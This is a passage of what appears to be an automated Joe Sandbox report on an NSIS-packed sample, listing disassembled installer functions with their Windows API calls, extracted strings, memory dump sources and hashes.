                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

                                                          Non-executed Functions

                                                          Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                          • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                          • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                          • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                          Function 0040335A Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 383stringfilecomCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                          • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                          • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-1875889550
                                                          • Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                          • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                          • Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                          • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                          Function 004057D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,00436800,774D2EE0,00434000), ref: 004057F9
                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,774D2EE0,00434000), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,774D2EE0,00434000), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,774D2EE0,00434000), ref: 0040586A
                                                          • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,774D2EE0,00434000), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*
                                                          • API String ID: 2035342205-1173974218
                                                          • Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                          • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                          • Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                          • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                          Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                          • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                          Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,774D2EE0,004057F0,?,00436800,774D2EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          • API String ID: 2295610775-3088156181
                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                          Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405480
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405531
                                                          • ShowWindow.USER32(00000008), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {$&B
                                                          • API String ID: 590372296-2518801558
                                                          • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                          • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                          Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: &B
                                                          • API String ID: 184305955-3208460036
                                                          • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                          Function 0040391F Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 216stringregistrylibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,774D3420,00000000,00434000), ref: 004039A0
                                                          • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                          • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-1918744475
                                                          • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                          Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                          • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
